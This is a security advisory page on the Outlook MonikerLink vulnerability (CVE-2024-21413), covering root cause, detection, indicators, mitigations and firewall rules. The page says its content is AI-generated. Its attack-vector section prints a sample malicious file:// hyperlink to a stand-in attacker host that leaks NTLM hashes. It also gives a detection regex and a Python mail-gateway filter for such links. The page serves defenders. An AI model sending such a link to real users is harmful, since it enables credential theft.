CVE-2024-21413 Overview
CVE-2024-21413 is a remote code execution vulnerability in Microsoft Outlook, known as the MonikerLink bug. The flaw stems from improper input validation [CWE-20] when Outlook parses specially crafted hyperlinks that use the file:// protocol and contain an exclamation mark. By manipulating moniker links, attackers can bypass Office Protected View and cause Outlook to load remote payloads through COM. Successful exploitation can leak local NTLM credentials and enable arbitrary code execution in the context of the user. The vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog, and a public proof-of-concept is available.
Critical Impact
Attackers can execute arbitrary code and steal NTLM hashes from Outlook users by sending a crafted email containing a malicious MonikerLink, without requiring user interaction beyond previewing the message.
Affected Products
- Microsoft 365 Apps for Enterprise
- Microsoft Office 2016 (x86 and x64)
- Microsoft Office 2019 (x86 and x64)
- Microsoft Office Long Term Servicing Channel (LTSC) 2021
Discovery Timeline
- 2024-02-13 - CVE-2024-21413 published to NVD
- 2025-10-28 - Last updated in NVD database
Technical Details for CVE-2024-21413
Vulnerability Analysis
The vulnerability resides in how Outlook parses hyperlinks that reference the Component Object Model (COM) moniker subsystem. Crafted file:// URIs containing an exclamation mark cause Outlook to invoke MkParseDisplayName and load the referenced resource through a registered COM handler instead of treating it as an untrusted file path. This bypasses the Protected View sandbox that Microsoft Office normally enforces for content originating from email. The exploitation flow described by Check Point Research triggers SMB authentication to an attacker-controlled host, leaking the Net-NTLMv2 hash of the victim. The same primitive can launch other COM-registered applications such as Microsoft Word in editing mode, expanding the attack surface to additional document-parsing vulnerabilities. The bug is reachable from the Outlook preview pane in some configurations, removing the need for the user to explicitly click the link.
Root Cause
The root cause is improper input validation in the URL parsing routine that handles hyperlinks in Outlook messages. Outlook fails to sanitize the ! character in file:// URIs, so the underlying COM API interprets the value as a composite moniker instead of a path string.
Attack Vector
The attack vector is network-based. An attacker sends an email containing a hyperlink such as <a href="file:///\\attacker.tld\share\file.rtf!something">click</a>. When Outlook processes the message, the embedded moniker forces a remote resource load over SMB or WebDAV, resulting in credential disclosure and potential code execution through chained Office handlers. See the Check Point Analysis on MonikerLink Bug and the public proof-of-concept repository for technical details.
Detection Methods for CVE-2024-21413
Indicators of Compromise
- Inbound emails containing hyperlinks with file:// URIs that include an exclamation mark followed by additional path data.
- Outbound SMB (TCP/445) or WebDAV connections originating from OUTLOOK.EXE to untrusted external hosts immediately after email retrieval.
- Unexpected child processes spawned by OUTLOOK.EXE, including WINWORD.EXE, rundll32.exe, or scripting hosts loading remote content.
- NTLM authentication events directed at external IP addresses sourced from end-user workstations.
Detection Strategies
- Inspect mail flow at the gateway for HTML or plain-text hyperlinks containing the pattern file://.*! and quarantine matching messages.
- Hunt endpoint telemetry for OUTLOOK.EXE invoking MkParseDisplayName followed by network egress to non-corporate destinations.
- Correlate process-create events where Outlook is the parent of an Office or scripting binary with the loaded command line referencing a UNC path.
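The gateway check described above, written as an added example (not code from the original page or from any vendor script): it extracts hrefs from an HTML mail body and flags file:// URIs whose path portion carries a "!" moniker delimiter. It decodes HTML entities and percent-encoding first, since a naive file://.*! regex misses "&#33;" or "%21". The sample body and host names are constructed for the example.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample message body (not taken from the original page); the
# first and last hrefs follow the MonikerLink shape described in the advisory.
SAMPLE_HTML = r"""
<p>Quarterly report attached:</p>
<a href="file:///\\fileserver.example\share\report.rtf!x">open</a>
<a href="https://intranet.example/report">intranet</a>
<a href="file:///C:/Users/Public/notes.txt">local notes</a>
<a href="FILE://fileserver.example/share/a.docx%21y">encoded</a>
"""

# Matches href="..." or href='...' regardless of attribute case.
HREF_RE = re.compile(r"""href\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def is_monikerlink_candidate(href: str) -> bool:
    """Return True for a file:// URI whose path contains a '!' that would be
    handed to MkParseDisplayName as a composite moniker.

    HTML entities and percent-encoding are decoded before inspection so that
    '&#33;' or '%21' cannot slip past a plain 'file://.*!' pattern.
    """
    decoded = unquote(html.unescape(href)).strip()
    if not decoded.lower().startswith("file:"):
        return False
    # Everything after the scheme is the path/UNC portion; a '!' anywhere in
    # it is the moniker delimiter the advisory describes.
    path = decoded[len("file:"):]
    return "!" in path


def find_monikerlinks(body: str) -> list[str]:
    """Return every hyperlink in an HTML body that should be quarantined."""
    return [h for h in HREF_RE.findall(body) if is_monikerlink_candidate(h)]


if __name__ == "__main__":
    for link in find_monikerlinks(SAMPLE_HTML):
        print("quarantine:", link)
```

Plain-text bodies can be scanned with the same predicate by feeding each whitespace-delimited token that starts with "file:" to is_monikerlink_candidate.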
Monitoring Recommendations
- Enable PowerShell and Office telemetry logging through Microsoft Defender for Endpoint or equivalent EDR to capture COM activation events.
- Forward authentication logs to a SIEM and alert on NTLM challenges from internal workstations to external IP space.
- Review Outlook crash and Application logs for anomalous moniker-handling errors that may indicate exploitation attempts.
How to Mitigate CVE-2024-21413
Immediate Actions Required
- Apply the February 2024 Microsoft Patch Tuesday updates for Microsoft 365 Apps, Office 2016, Office 2019, and Office LTSC 2021 immediately.
- Block outbound SMB (TCP/445) and WebDAV traffic from user workstations to the public internet at the perimeter firewall.
- Enforce SMB signing and disable NTLM authentication to external destinations to limit credential theft impact.
- Prioritize remediation given the CISA KEV listing and the publicly available proof-of-concept exploit.
Patch Information
Microsoft released fixes on February 13, 2024. Refer to the Microsoft CVE-2024-21413 Update guidance for the exact build numbers per channel. Administrators can also apply the Vicarius Mitigation Script for CVE-2024-21413 and validate exposure using the Vicarius Detection Script.
Workarounds
- Configure Group Policy to disable the Outlook preview pane until patches are deployed enterprise-wide.
- Restrict outbound SMB and WebDAV at the network edge to prevent credential relay and remote payload loading.
- Use Microsoft Defender Attack Surface Reduction rules to block Office applications from creating child processes.
- Train users to avoid clicking unsolicited links and report suspicious messages containing file:// URIs to the security team.
# Configuration example: block outbound SMB on Windows endpoints
New-NetFirewallRule -DisplayName "Block Outbound SMB 445" `
-Direction Outbound -Protocol TCP -RemotePort 445 `
-Action Block -Profile Any
# Disable NTLM authentication to remote servers via Group Policy
# Computer Configuration > Windows Settings > Security Settings >
# Local Policies > Security Options >
# "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" = Deny all
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.